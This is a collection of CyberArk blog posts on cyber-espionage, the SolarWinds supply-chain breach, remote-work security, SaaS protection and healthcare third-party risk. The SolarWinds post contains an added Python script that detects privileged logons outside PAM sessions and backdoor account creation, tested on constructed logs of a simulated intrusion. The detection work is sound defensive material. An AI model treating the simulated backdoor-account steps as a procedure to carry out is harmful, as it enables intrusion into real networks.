“[Cyber-espionage] is not something that is very dramatic, you know?” explains CyberArk Labs lead security researcher Lavi Lazarovitz, a 12-year veteran of the Israeli Air Force and Israeli Intelligence Corps who has helped build and expand CyberArk’s security team since joining six years ago. “If you had a camera inside the headquarters of the threat actors, you’d just see a lot of people connecting with basic desktop protocols, just querying data. It’s not dramatic. But what happens on the other side of it is dramatic.”

A distinct lack of drama on the surface is largely what fuels the success of cyber attacks. Verizon recently released its first-ever Cyber-Espionage Report, a deeper dive into the evolving landscape of cyber attacks that builds off its annual Data Breach Investigations Report (DBIR). Both reports found similar, and perhaps not surprising, stats, such as the fact that 86% of data breaches were for financial gain, and that more than half (56%) of the time, threat actors are going after credentials to gain a foothold and unlock critical assets. But where the Cyber-Espionage Report goes a little deeper is into the ways in which cyber attacks thrive less on shadowy quick strikes at specific targets, and more on slow, quiet infiltration buttressed by very personal and seemingly normal direct contact with their victims. Add to that simple human error, and you have situations that open up more vulnerabilities that can potentially create even more damage than ransomware and other malware-based attacks.

All Hands on Deck

Threat actors thrive on periods of fluctuation and transition, and the past year has seen an abundance of both as organizations and employees have had to make radical adjustments to where and how they work with little to no preparation. But even prior to the emergency mass adoption of remote work and the added burden – and importance – of privileged access management (PAM), Lazarovitz and his team have seen security become less the domain of specialized experts and more a collective responsibility.

“There are a lot of advantages and disadvantages to the fact that security is not only the business of the security guys,” says Lazarovitz. “Engineers, developers – they now have their hands in a lot of sensitive material. All along here there is sensitive access and secrets and identities that need to be protected.”

Lazarovitz points out that there are benefits to having security concerns as a frequent touchpoint along the production pipeline, too. “It brings more firepower to security. Now security is integrated into each part of the development pipeline. But because many of the developers and stakeholders, in general, are not proficient or skilled enough to manage or configure security, most of the breaches we see are simply based on misconfiguration and mistakes. A misconfigured access to servers, an open firewall…all of these are now managed by a lot of stakeholders, and mistakes are bound to happen.”

The GIF Offensive

Perhaps the most shocking revelation in the Verizon reports is just how much human contact is behind a large portion of cyber attacks. The top three methods – accounting for 67% of all breaches – are phishing/social attacks, human error, and credential theft (which is often the result of No. 1). Lazarovitz puts it in advertising terms, comparing the actions of threat actors to a brand’s “conversion rate” – the more customers they contact, the more likely they are to make a figurative sale. “Personal interaction is something that is known to be very, very effective,” he says. “Social engineering is the leading attack vector when it comes to opportunistic attackers and nation-states – all of them rely on social engineering.”

By now, most people are aware that they shouldn’t open attachments they don’t recognize, and most spam filters corral suspicious email addresses, but the recent reliance on remote communication and collaboration applications like Zoom and Microsoft Teams has provided the opportunity for phishing attacks to become more targeted, manipulative and subtle.

Even a friendly-seeming GIF can be a foothold for a threat actor.

“During this COVID pandemic, messaging apps have become a popular way to communicate – and they allow threat actors to make communications appear more personal,” says Lazarovitz. “It’s not just a spamming email or something. Now you get tailored messages, sometimes you get GIFs and you feel more comfortable looking at it, interacting with it, but just viewing it can compromise someone’s identity and let a threat actor gain a foothold.”

As Lazarovitz goes on to explain, attackers rarely home in on one target and “smash and grab” to get it. He describes it as more of a “living off the land” approach, where a threat actor won’t use any outside tools but will utilize an organization’s own administrative tools and communication platforms to appear as normal and non-invasive as possible. Combining that with personalized messages and “normal” interaction, gaining access to credentials, and overcoming access controls becomes that much easier.

It’s why breaches are rarely dramatic events at the outset, and often don’t immediately raise red flags. “The threat actor can use a dormant privileged account to get in undetected, and once within the network, they can reach out to people directly disguised as one of their own employees,” Lazarovitz says, reinforcing the idea that the goal of many cyberattacks is to exist within an organization’s ecosystem for as long as it can, appearing as “normal” as it can. As the Verizon Report indicates, not only does it take an average of months to even years to detect an attack in 69% of breach incidents, but often the breach isn’t even detected by the victim organization itself but rather by a third party.

“These espionage campaigns are very long and slow, they take a lot of time. After conducting reconnaissance, attackers seek out privileged credentials and accounts, then escalate privileges that allow them to move laterally and vertically toward their target, which obviously, in many cases, is sensitive data,” Lazarovitz says.

Threat actors take full advantage of both the growing sophistication of messaging apps and communication software, and their ubiquitous use as organizations implement more remote staff. The flaws are many, and there isn’t what Lazarovitz describes as a “silver bullet” to fix them all.

That’s where post-exploitation research and adversary simulation come in, employing a host of tactics, techniques, and procedures (TTPs) used in real-world attacks to uncover hidden vulnerabilities, test security procedures, and pinpoint areas that need to be improved. Security-focused teams like Lazarovitz’s comprise experts from various backgrounds, harnessing their talents and natural curiosity to think and act like real attackers who’ve gotten inside – helping organizations prepare for real attacks against their infrastructure.

While such teams – which spend almost as much time anticipating unknown threats as they do defending against known ones – are vital, cyber-espionage actually benefits the most from the tiny, seemingly innocuous mistakes that everyone is prone to. This is both a source of frustration and a reminder that the threat to our digital lives isn’t necessarily nebulous and inevitable.

The threats we face won’t take the form of elaborate, cinematic attacks. They’ll be mundane, seemingly innocuous, and waiting for the slightest crack to emerge. And that’s why healthy suspicion, constant vigilance, and a “think like an attacker” mindset are the foundation of effective cybersecurity.

Four Ways to Protect Against Supply Chain Infiltration https://www.cyberark.com/blog/four-ways-to-protect-against-supply-chain-infiltration/ Thu, 07 Jan 2021 15:24:38 +0000 https://www.cyberark.com/?p=107445

The far-reaching SolarWinds Orion attack has catapulted supply chain security vulnerabilities into the spotlight – particularly those involving the third-party software applications and hardware components that comprise much of today’s enterprise IT environments.

The attack, which has potentially impacted more than 18,000 organizations to date, stems from a compromise of third-party network management vendor SolarWinds’ Orion software. A sophisticated threat actor reportedly distributed malicious source code within an Orion software update – leveraging the very means by which organizations protect themselves against potential threats. This allowed the attacker to gain a foothold in victim organizations, steal and abuse legitimate identities and credentials, escalate privileges and move laterally and vertically to access valuable assets – and then maintain persistent access using the Golden SAML technique, never seen before in the wild.

The Evolution of Supply Chain Attacks

While the SolarWinds compromise is unprecedented in many ways, supply chain attacks are far from new. Attackers have long targeted third-party vendors across both digital and physical supply chains – from software and technology providers to attorneys and consultants, to manufacturing and logistics companies – as backdoors to the networks of their enterprise or government business partners.

According to Bloomberg, the Cybersecurity and Infrastructure Security Agency (CISA) reported in 2019 that federal agencies faced about 180 different threats from the digital supply chain alone. And in recent months, the world has seen a surge in supply chain attacks targeting healthcare companies involved in COVID-19 vaccine development and delivery. Today, the SolarWinds supply chain attack shows us just how precisely targeted threat actors have become.

A Realistic Zero Trust Approach that Won’t Hamstring Supply Chain Operations

Working with numerous third-party vendors is an inevitable part of doing business, but it also creates security blind spots that can become dangerous. To protect themselves, many companies and government agencies are embracing Zero Trust models – in which they trust nothing and verify everything. But as vendor ecosystems grow in size and complexity, a hard and fast “trust nothing” strategy down the supply chain can quickly inhibit business operations and slow innovation. A successful security strategy must be both realistic and sustainable.

Shay Nahari, Head of CyberArk Red Team Services, outlines steps organizations can take to significantly reduce the impact of a potential supply chain attack in this Dark Reading article. Here are four takeaways based on his piece:

1. Protect Privileged Access. With dramatic cloud migrations underway and the adoption of transformative digital technologies, privileged accounts and credentials represent one of the largest attack surfaces for organizations today. Identifying and managing privileged access is paramount to disrupting the attack chain – regardless of whether the attacker infiltrated the environment via the supply chain or by other means – and maximizing risk mitigation.

2. Embrace a Defense-In-Depth Approach. There is no silver bullet for cybersecurity, and no one vendor or tool can completely prevent an attack. An assume-breach mindset calls for multiple layers of security, such as endpoint detection and response, next-gen antivirus, strong privileged access management, and application and OS patching. But remember, cybersecurity is a journey, and it doesn’t have to happen all at once. A good starting point is to adopt a risk-based approach, investing first in the security controls that reduce the greatest amount of risk.

3. Consistently Enforce Least Privilege Everywhere. While breaches are inevitable, organizations can take steps to limit the blast radius of an attack by eliminating unnecessary privileges and permissions based on the principle of least privilege. Widespread adoption of public cloud services and SaaS applications has accelerated the need for least privilege controls in cloud environments. In fact, a recent ESG survey ranked overly permissive privileges as the most common attack vector against cloud applications. Strong least privilege enforcement can help prevent all identities, whether on-premises or in the cloud, from reaching sensitive targets.

4. Monitor for Privileged Credential Theft. As the SolarWinds attack shows, sophisticated attackers go to great lengths to hide their activity and avoid detection, and it can be extremely difficult to spot a supply chain infiltration. By monitoring privileged sessions, organizations can more easily spot suspicious behavior and patterns indicative of credential theft and better understand what critical assets are being targeted – enabling faster, more decisive response to protect the organization.

The supply chain represents a critical attack vector; however, by leading with an “assume breach” mindset and securing access to sensitive data and systems, organizations can make it significantly more difficult for attackers to accomplish their end goals.

If you have been affected by the SolarWinds Orion attack, or if you’re currently focused on strengthening your organization’s security posture, learn how our free Privileged Access Management (PAM) Rapid Risk Assessment and Remediation Offer can help you minimize exposure to this breach, while laying the foundation for longer-term, proactive strategies to help prevent supply chain infiltration and privileged credential compromise to protect your organization today and into the future.

A Look Back at 2020 Reveals Why Privilege Matters More Than Ever https://www.cyberark.com/blog/a-look-back-at-2020-reveals-why-privilege-matters-more-than-ever/ Mon, 28 Dec 2020 21:52:09 +0000 https://www.cyberark.com/?p=106840 Why Privileged Access Matters

As 2020 draws to a close (and, let’s face it – the new year really can’t come soon enough), we’re taking a look back at some of our most notable blogs, articles, and webinars of the year. Throughout the content, a common theme crystallizes: though the world turned upside down this year, what hasn’t changed is the fundamental way attackers operate – they go straight for organizations’ most valuable assets, from personal customer data to intellectual property for a COVID-19 vaccine to highly classified government secrets.

The recent SolarWinds Orion breach, and its far-reaching impact on public and private companies around the world, show us just how precise and sophisticated attackers have become. The unfortunate truth is, if an attacker wants to get into your organization right now, they probably will, whether it’s by compromising a vendor in your supply chain, phishing a highly privileged worker, targeting a misconfigured cloud account, or by other cunning means.

The best way to combat these evolving threats is to think like an attacker, fully embracing an “assume breach” mindset, accepting that attacks are inevitable and, as such, focusing time and efforts on protecting the assets that matter most to your business.

Privileged access is the gateway to those valuable systems and is at the core of nearly every major advanced attack. Though this isn’t a new phenomenon, in a time of widespread disruption and change, strong privileged access management (PAM) matters now more than ever. The following list of CyberArk resources published over the past year can help you better understand why, and provide you with the tools and insight needed to help improve security at your organization.

Cyber Attacks in the Pandemic Era: More of the Same Tried-and-True Approach

Since COVID-19 began its spread far and wide, we’ve seen near-constant headlines featuring cyber attacks, including many targeting organizations focused on stopping the virus. This post by Lavi Lazarovitz, head of CyberArk Labs, examines recent attack trends, vectors, and tactics – and reminds us that while opportunistic attackers will “never let a good crisis go to waste,” their approach remains largely the same – and remains largely effective.

The Cloud Explosion and New Threat Landscape

If the cloud was important before COVID-19, it became absolutely essential in its wake. Because it simplifies operations and offers the cost savings and scalability needed to stand up mobile, remote workforces quickly, organizations doubled down on public cloud services and SaaS applications in 2020. And just like that, cyber attacks targeting the cloud surged by 630% in mere months. Through the eyes of an attacker, every unsecured or misconfigured cloud identity, whether human, machine, or application, now represents an opportunity. In this piece, Sam Flaster explains why least privilege access is the key to effective cloud protection and an integral part of a proactive “assume breach” approach to cybersecurity.

“Assume Breach” from Inside and Other Learnings from 2020 Twitter Attack

In a time of unrelenting external attacks, the insider threat is not always top of mind. Yet an “assume breach” mentality – similar to Zero Trust models – requires organizations to trust nothing and verify everything – whether it comes from inside or outside the organization, or via a third-party vendor – before granting privileged access to sensitive data and assets. Consider this year’s highly publicized Twitter attack, which would not have been possible without the (unintentional) assistance of insiders with powerful system access. We break down the attack in this Q&A with Nir Chako, Security Research Team Leader for CyberArk Labs.

Remote Work Is Here to Stay: Steps to Secure the Permanent “New Normal”

The Q4 2020 CyberArk State of Remote Work study found that 95% of employees want to continue remote working, even after it’s deemed safe to return to the office. Many employers are adapting to make this “new normal” a “permanent normal” for employees and individuals across their supply chains. Yet, risky security practices could force businesses to reconsider the long-term viability of remote work. This piece by Corey O’Connor outlines four ways privileged access management can help organizations effectively balance security and user productivity and convenience to make remote work “work” for the long term. You can also listen to these recommendations in our on-demand webinar.

Four Strategies to Stop the Cyber Attack Cycle

Securing privileged access helps shrink the attack surface by breaking the attacker toolset and restricting the spread of an attack. Limiting lateral movement forces attackers to use tactics that are ‘louder’ and more easily identifiable, often alerting the organization of the attack so it can respond and halt its progression. This Dark Reading article – based on analysis by CyberArk Labs – outlines strategies for using strong privileged access controls to stop privileged credential compromise and escalation, prevent lateral movement, slow the spread of ransomware and minimize the risk of account takeovers.

The Future of PAM and Reducing Risk for Modern Digital Enterprises

As organizations like yours embrace cloud, hybrid IT, DevOps, remote work models, automated workflows, and other transformational technologies, the role of privileged access management has evolved to secure these trends at zero point. Check out this webinar to hear from KuppingerCole Senior Analyst Paul Fisher and CyberArk Executive Vice President Adam Bosnian on PAM business drivers, trends, and alignment with modern business demands – and how the right, advanced solution can help your organization accelerate digital transformation, drive efficiency, maintain compliance and reduce risk.

How to Achieve Sustained PAM Program Success

If you’re looking for help in developing or maturing your organization’s privileged and identity access management programs today, don’t miss this webinar on the CyberArk Blueprint – our PAM maturity framework based on decades of experience working with thousands of global customers. You’ll see the Blueprint in action across a series of use cases, and get prescriptive guidance on how to drive lasting organizational change and achieve measurable, progressive results that reduce privilege-related risk.

When it comes to cybersecurity, 2020’s bottom line is this: Your organization cannot stop attacks if you don’t secure privileged access everywhere – in the cloud, on endpoint devices, in applications, within automated processes and throughout the DevOps pipeline. As you look to the year ahead, take a hard, honest look at your current security practices. Don’t assume what you’re reading about in today’s news headlines can’t happen to you. Make privilege a 2021 cybersecurity priority and stay a step ahead.

The SolarWinds Breach and the Privilege Priority https://www.cyberark.com/blog/the-solarwinds-breach-and-the-privilege-priority/ Wed, 23 Dec 2020 08:00:37 +0000 https://www.cyberark.com/?p=106569

The details of the SolarWinds Orion breach continue to unfold, with the impact of this supply chain attack rippling throughout the tech community and across the more than 18,000 public and private sector organizations directly affected worldwide. It could be several months until the extent of the damage is fully understood. But today, we can examine what has been reported about the Tactics, Techniques and Procedures (TTPs) used, map out common attack patterns and identify steps organizations can take to mitigate associated risks and lessen further damage.

The Privileged Pathway Most Traveled

The SolarWinds Orion compromise and the subsequent attacks on customers using this software are unprecedented in their sophistication, scope and scale. However, what they do have in common with other attacks is that the compromise of identities and privileged access played a critical role.

Today’s cyber adversaries have the advanced tools and resources to infiltrate even the most sophisticated IT environments, whether through phishing attacks, software vulnerabilities, supply chain compromise or other means. Once they establish a foothold, they often follow these well-established steps in the attack chain:

  • Attempt to steal and abuse the identities and credentials of employees or authorized third parties.
  • Use these legitimate credentials to move laterally and vertically through the network, looking for high-value targets or to establish persistence. Because attackers appear to be “authorized” users, organizations have a hard time detecting their presence.
  • Target privileged account credentials that provide special access to systems or abilities that reach beyond those of a typical user – and work to escalate these privileges until they reach the confidential information they intend to steal or services they wish to disrupt.

The SolarWinds breach and the resulting attacks exhibit all three of these tried-and-true tactics. With dramatic cloud migrations underway, and the adoption of transformative digital technologies, the enterprise attack surface is expanding with greater privileged access present across these decentralized environments. Attackers know this, which is why securing privileged access matters more today than ever before.

This attack underscores the urgency for every organization – regardless of industry or size – to adopt an “assume breach” mindset. By approaching cybersecurity as if an attacker is already inside their infrastructure, organizations can narrow their focus and take the necessary steps to protect their most sensitive data and applications to prevent data theft or business disruption.

Protecting Your Environment from Advanced Attacks

While there is no one vendor or tool that can completely prevent such breaches from happening, there are immediate steps that organizations can take to help minimize their exposure to this SolarWinds breach, including:

  • Deploy a Privileged Access Management (PAM) solution or validate existing PAM deployments
  • Rotate credentials on a regular cadence
  • Restrict access to Tier 0 assets from a specific, hardened control point
  • Isolate sessions when privileged credentials are used
  • Detect backdoor account creation
  • Deploy “least privilege” measures to endpoints and workstations (including those used to administer the PAM solution)
  • Monitor for managed credential use outside the PAM solution
  • Establish normal behavior patterns of existing users and elevate to stronger authentication when anomalies are detected
  • Enable risk-aware, adaptive Multi-Factor Authentication (MFA) whenever possible
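Two of the controls above, “Detect backdoor account creation” and “Monitor for managed credential use outside the PAM solution” (the same idea as the “Monitor for Privileged Credential Theft” takeaway in the supply chain post earlier on this page), can be turned into a concrete correlation check. The following is an added example, not CyberArk code: it assumes that PAM session records can be exported as account/host/start/end tuples and that endpoint logons arrive as Windows Security events (4624 logon, 4720 account created, 4728 member added to a global group). The session records and log lines are constructed, and the log format is a simplified key=value rendering rather than the native event XML.

```python
"""Flag vaulted-credential use outside a PAM session, plus new-account and
privileged-group changes. Added example; all records below are constructed."""
from dataclasses import dataclass
from datetime import datetime, timedelta
import re

# Real Windows Security event IDs used by this check:
#   4624 successful logon, 4720 user account created,
#   4728 member added to a security-enabled global group
LOGON, ACCOUNT_CREATED, GROUP_ADD = "4624", "4720", "4728"

MANAGED_ACCOUNTS = {"svc_backup", "domainadmin"}           # vaulted accounts (constructed)
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins"}
SLACK = timedelta(minutes=2)   # tolerance for clock skew between PAM and endpoints


@dataclass
class PamSession:
    """One brokered connection as the PAM solution would export it (assumed shape)."""
    account: str
    host: str
    start: datetime
    end: datetime


def ts(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


# Constructed PAM session records.
PAM_SESSIONS = [
    PamSession("svc_backup", "fs01", ts("2020-12-20T09:00:00Z"), ts("2020-12-20T09:30:00Z")),
    PamSession("domainadmin", "dc01", ts("2020-12-20T13:00:00Z"), ts("2020-12-20T13:45:00Z")),
]

# Constructed log lines: timestamp, then key=value fields; quoted values may contain spaces.
LOG_LINES = [
    "2020-12-20T09:05:12Z host=fs01 event=4624 account=svc_backup logon_type=3 source=10.0.5.20",
    "2020-12-20T11:42:03Z host=fs01 event=4624 account=svc_backup logon_type=3 source=10.0.9.77",
    "2020-12-20T13:10:40Z host=dc01 event=4624 account=domainadmin logon_type=10 source=10.0.5.20",
    "2020-12-20T13:12:05Z host=dc01 event=4720 account=svc_helpdesk2 actor=domainadmin",
    '2020-12-20T13:12:30Z host=dc01 event=4728 account=svc_helpdesk2 group="Domain Admins" actor=domainadmin',
    "2020-12-20T14:01:00Z host=ws17 event=4624 account=jdoe logon_type=2 source=-",
    "2020-12-20T22:15:44Z host=dc01 event=4624 account=domainadmin logon_type=3 source=10.0.9.77",
]

KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_line(line: str) -> dict:
    """Turn one log line into a dict of fields plus the parsed timestamp."""
    fields = {k: (q if q else v) for k, q, v in KV_RE.findall(line)}
    fields["raw_time"] = line.split(" ", 1)[0]
    fields["time"] = ts(fields["raw_time"])
    return fields


def covered_by_pam(account: str, host: str, when: datetime, sessions) -> bool:
    """True if a PAM session for this account on this host spans the logon time."""
    return any(
        s.account == account and s.host == host
        and s.start - SLACK <= when <= s.end + SLACK
        for s in sessions
    )


def analyze(lines, sessions) -> list:
    """Return one alert dict per suspicious event, in log order."""
    alerts = []
    for line in lines:
        ev = parse_line(line)
        base = {"account": ev.get("account"), "host": ev["host"], "time": ev["raw_time"]}
        if ev["event"] == LOGON and ev["account"] in MANAGED_ACCOUNTS \
                and not covered_by_pam(ev["account"], ev["host"], ev["time"], sessions):
            # A vaulted credential was used with no brokered session to explain it.
            alerts.append({"kind": "logon_outside_pam", "source": ev.get("source"), **base})
        elif ev["event"] == ACCOUNT_CREATED:
            # Every new account on a domain controller deserves review (possible backdoor).
            alerts.append({"kind": "account_created", "actor": ev.get("actor"), **base})
        elif ev["event"] == GROUP_ADD and ev.get("group") in PRIVILEGED_GROUPS:
            alerts.append({"kind": "privileged_group_add", "group": ev["group"],
                           "actor": ev.get("actor"), **base})
    return alerts


if __name__ == "__main__":
    for alert in analyze(LOG_LINES, PAM_SESSIONS):
        print(alert)
```

The check is deliberately narrow: a managed account logging on to a host with no matching PAM session is the signal, so the session export must include the target host and a small skew allowance, or every legitimate session will be flagged at its edges. In practice the same correlation is run against the SIEM rather than a list of strings.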

How CyberArk Can Help

As the leader in Privileged Access Management (PAM), CyberArk is here to help organizations that have been affected by the SolarWinds attack. We’ve activated our community of CyberArk experts and professional services team to provide a Privileged Access Management (PAM) Rapid Risk Assessment and Remediation offer.

This offer starts with a free privileged access assessment (including recommendations) at no cost to customers who were running the compromised Orion software in their environment. Should additional steps be needed, CyberArk and our certified partners can assist customers in prioritizing PAM controls such as credential management, multi-factor authentication, session isolation and least privilege on endpoints and servers for rapid risk reduction. Such measures will be based on findings from the customer’s incident response team and in alignment with the CyberArk Blueprint for PAM Success.

CyberArk stands by the organizations that have been impacted by the SolarWinds attack and we remain steadfast in our mission and commitment to help organizations secure their most valuable assets and stay one step ahead of attackers.

Here’s What Worked, and What Didn’t, for Remote Workers in 2020 https://www.cyberark.com/blog/heres-what-worked-and-what-didnt-for-remote-workers-in-2020/ Thu, 17 Dec 2020 13:23:46 +0000 https://www.cyberark.com/?p=106440 Remote Workers Survey

As the meme goes, 2020 has been a long decade – and it certainly feels that way. The global COVID-19 pandemic has upended our sense of normalcy and forced many aspects of everyday life into the confines of home, where, in the absence of social gatherings and holiday festivities, we now have lots of free time to reflect on the year and, of course, scroll through all those “worst of 2020” memes.

The way we work has also changed dramatically during this year. To check in on how employees are faring after nearly nine months of remote work (aka WFH), we surveyed 2,000 remote employees around the world asking them what they like – and dislike – most about their new working arrangements. Here’s a look at some of our findings.

Remote Workers Survey: Benefits and Challenges

WFH Diary Entry #35. I’ve logged 50 miles of walking this month during lunch breaks and feel healthy and focused. The extra 45 minutes of sleep each morning doesn’t hurt either. Long live remote work!

For many office workers, hectic mornings of school car lines and bumper-to-bumper traffic are but a distant memory. We’ve settled into new normal(ish) routines, commuting from upstairs to down and bed to desk, ready to take on the workday from the couch or home office.

The shift to remote work has been a big change, but for most people, it’s been a largely positive one. Nearly half (47%) feel more productive at home, citing the flexibility to run errands, take a walk or do household chores between meetings. Meanwhile, 32% of remote workers say putting their commutes in park is a key benefit. Plus, it’s (basically) a scientific fact that wearing sweatpants while working increases one’s overall mood and sense of wellbeing.

With more time and flexibility in their days, it’s unsurprising that 95% of employees want to continue working from home even after their offices re-open.

WFH Diary Entry #68. Signing in from the kitchen table – feeling good about today’s big meeting. The gang’s all here… including the cat who won’t get off my keyboard… and a virtual classroom of 20 kindergarteners. What could possibly go wrong?! 

Of course, remote work has its downsides (quarantine 15, anyone?). For instance, nearly half of respondents (45%) say disruption from family and pets is their biggest challenge. Anyone who’s had to proctor a spelling test while giving a work presentation while frantically muting every other word to muffle their barking dog can relate. And as the lines between work and home blur, always-home and always-on increasingly means always-working. Forty-three percent of remote workers say they struggle to maintain the right work/life balance.

WFH Diary Entry #106: This Zoom meeting could have been an email. Also, my kids are suspiciously quiet right now.  

For the first few weeks of remote work, it was sort of fun to connect with colleagues by video. We saw their home offices, “met” their significant others and kids (hopefully not wielding dripping paint brushes), and gushed over their adorable pets. We got creative with elaborate video backgrounds and turned ourselves into virtual potatoes during team brainstorms. But for most people, the novelty wore off quickly. Many working parents are still juggling work meetings and virtual schooling – there is no secret recipe to keep these in peaceful co-existence. And what once was a quick ‘swing by someone’s desk’ to ask a question is yet ANOTHER 30-minute video call. It’s no wonder 34% of remote workers cite “Zoom fatigue” as a top challenge.

WFH Diary Entry #112: Have so much to do today but I’m locked out of the system again. IT support ticket says 48 hours… there goes my productive week.

For 78% of employees, working through technical issues like connecting securely to corporate systems and resources is a major hurdle. To stay productive and keep up with work responsibilities, 67% admit to finding workarounds to corporate security policies, from sending work documents to personal email addresses and sharing passwords, to installing rogue applications on company-issued devices.

While these shortcuts may seem harmless, they can potentially open doors for cyber attackers, leading to credential theft, fraud, and costly security breaches. This is why now’s as good a time as any to brush up on cybersecurity best practices to protect your own digital persona, along with your employer’s. And if you’re like 46% of respondents who haven’t received remote-work-specific security training, ask about it and do your part to keep safe and secure remote work a viable option for the long run. It’s everyone’s responsibility to keep safe and secure in our remote and hybrid work environments. Your sweatpants will be glad you did.

How to Secure Your SaaS Applications https://www.cyberark.com/blog/how-to-secure-your-saas-applications/ Wed, 16 Dec 2020 15:54:10 +0000 https://www.cyberark.com/?p=106201

Editor’s Note: This is part four of a blog series on securing privileged access and identities in the cloud.

Now more than ever, Software as a Service (SaaS) applications not only enable communication and collaboration, they’re also a lifeline for remote workers, and are helping organizations efficiently manage internal operations, rapidly innovate to stay ahead of the competition, and deliver greater customer value.

While a majority of enterprises rely on these business-critical SaaS applications, like cloud-based CRM and email platforms, a CyberArk survey of business and IT decision-makers found nearly 70% do not prioritize their protection. Further, 56% of respondents reported an issue that affected the confidentiality, integrity, or availability of their business-critical applications within 24 months of the study.

With SaaS applications, it’s relatively easy for an individual within an organization to purchase a subscription with a credit card without going through formal procurement processes or involving finance or IT. While this ease of deployment and adoption is a benefit over traditional on-premises applications, it also gives rise to “shadow IT.” When IT security teams don’t approve, manage or even know about rogue SaaS applications, the risk of exposure and data breaches can increase substantially.

Properly securing and managing SaaS applications is an essential part of a comprehensive cybersecurity strategy. Here are five ways to get started:

  1. Treat all administrative access to SaaS applications, such as admin accounts used to set up single sign-on (SSO) integrations, as privileged. In most organizations, a variety of users access admin accounts for SaaS applications, such as Salesforce, ServiceNow, Jira, DocuSign, Dropbox and more. Take shared accounts for corporate social media platforms, for example. Credentials are often shared across teams and even third-party contractors and are rarely changed, making them easy targets for external attackers and malicious insiders. Such accounts must be viewed as privileged accounts, and best practices for privileged access management must be implemented to mitigate the risk of compromise. Specifically, privileged credentials should be secured in a central vault and automatically rotated, and all activity must be recorded and available for audit. Human, machine, and application users with access to sensitive information in SaaS applications should also be considered privileged.
  2. Implement single sign-on to secure access to cloud apps. As companies bring more SaaS applications online, login credentials become increasingly attractive targets for attackers. Passwords alone are not enough to verify a user’s identity and protect businesses from data loss, fraud, and malicious attacks. SSO leverages a central identity provider such as Microsoft Active Directory, Azure AD, Okta Universal Directory, or Ping Identity to manage user authentication and grant access to SaaS applications through a single set of login credentials. This improves security with stronger password policies, increases productivity with simplified access to all the applications employees need to do their jobs, and makes it easier for IT to monitor and manage access across the entire enterprise.
  3. Strengthen access controls with multi-factor authentication (MFA). MFA helps ensure users are who they say they are by requiring them to pass multiple authentication challenges like providing a one-time code sent to their mobile devices. In the remote work era, SaaS applications are regularly accessed from outside the corporate network and MFA is an instrumental layer in verifying user identities and preventing the use of compromised credentials. But do not forget that the privileged accounts used to manage MFA software must also be protected at all times with strong privileged access controls.
  4. Install and integrate an identity governance solution. Integrating with industry-leading identity governance and administration (IGA) solutions enables organizations to gain a unified view of their identity landscape and consistently manage all identities, including privileged identities and access entitlements, based on defined company policies to meet regulatory compliance and access policy requirements.
  5. Stay up to date. Leverage a central identity provider to manage user authentication for application provisioning and de-provisioning so that SaaS console access is automatically removed when an employee leaves the organization or if their role changes within the organization. This is critical so that users can’t continue to access cloud services they don’t actually use or need. Implementing least privilege, in which all identities have only the minimum necessary entitlements to perform their ongoing responsibilities, is a best practice and makes it more difficult for attackers to escalate privileges. We’ll explore this further in our next post in this series.

A comprehensive approach to identity and privileged access management can help secure the human, machine, and application credentials used by your organization’s SaaS applications as well as your cloud-native applications built using DevOps methodologies. Learn more in our eBook, “Securing Privileged Access and Identities in 5 Key Cloud Scenarios.”

Healthcare’s Third-Party Privileged Access Problem Is Now a State of Emergency https://www.cyberark.com/blog/healthcares-third-party-privileged-access-problem-is-now-a-state-of-emergency/ Fri, 11 Dec 2020 15:59:54 +0000 https://www.cyberark.com/?p=106062 Healthcare’s Third-Party Privileged Access Emergency

A technology disruption in a hospital operating room or an emergency response chain can spell the difference between life and death. Yet as healthcare providers, medical R&D, and pharmaceutical companies around the world work to combat the spread of COVID-19, cyber criminals are taking calculated steps to hit these organizations… just when society needs them most. In many cases, attackers are targeting third parties and vendors with privileged access to these organizations’ critical data and systems. Sadly, this has become a regular occurrence for companies involved in COVID-19 vaccine research, development, and delivery.

On Wednesday, the European Medicines Agency (EMA) – the EU’s governing body responsible for assessing and approving vaccines – disclosed it was the subject of a cyber attack. While they did not divulge specifics, Ars Technica reports that shortly thereafter, pharmaceutical company Pfizer and biotech company BioNTech issued a joint statement indicating documents related to their COVID-19 vaccine candidate had been unlawfully accessed via an EMA server. The statement notes that “no BioNTech or Pfizer systems have been breached in connection with this incident and we are unaware that any study participants have been identified through the data being accessed.”

The exact attack timeline and the attackers’ motivations are unconfirmed, but the disclosure comes just weeks after Pfizer and BioNTech announced that their “BNT162b2” vaccine is 95% effective in preventing COVID-19.

This attack is just one in a string of breach attempts on third parties that have access to valuable vaccine information.

Last Thursday, headlines emerged on a large-scale email phishing campaign targeting coronavirus vaccine supply chains. The IBM research team that uncovered the threat wrote that “the precision targeting of executives and key global organizations hold the potential hallmarks of nation-state tradecraft.” They went on to assess that “the purpose of this campaign may have been to harvest credentials to gain future unauthorized access. From there, the adversary could gain insight into internal communications, as well as the process, methods, and plans to distribute a COVID-19 vaccine.”

The supply chain attack prompted a warning from the Department of Homeland Security and highlighted the challenges today’s R&D organizations and interconnected healthcare providers face in protecting life-saving systems, sensitive patient data, and valuable intellectual property from attacks via third-party ecosystems.

Healthcare Partners and Suppliers are High-Value Targets

The healthcare industry is increasingly relying on technology – including SaaS applications, IoT-enabled devices, mobile diagnostics systems, telemedicine platforms, and more – to improve patient services and optimize clinical outcomes.

Modern integrated care delivery hinges on the ability to exchange patients’ protected health information (PHI) across all identities and technology components. Privileged accounts and credentials make this “interoperability” possible by allowing administrators to access applications or data, or for devices and systems to access one another. Everything from cloud-based virtual care applications to patient diagnostic data integration from third-party services requires privileged access.

Attackers know that privilege is the path to PHI – and they’re highly motivated to gain access. A single PHI record can fetch as much as $363 on the dark web, compared to credit card records which only go for $1-2. One can only imagine what confidential COVID-19 vaccine “recipes” and related intellectual property could net.

But why try to break into a heavily guarded fortress when you can just hijack a delivery truck that’s authorized to enter the premises? That’s how attackers think and that’s why they target providers, third parties, and vendor organizations of all sizes across the continuum of care.

For example, a few years ago a popular SaaS-based transcription service was targeted in a NotPetya ransomware attack. The resulting outages impacted major US healthcare systems, obliterating doctors’ instructions to patients and disrupting numerous critical services, from imaging to order processing to patient care tracking software. The ripple effects of the attack impacted patient care for weeks, and the software company itself lost $92 million in revenue as a result.

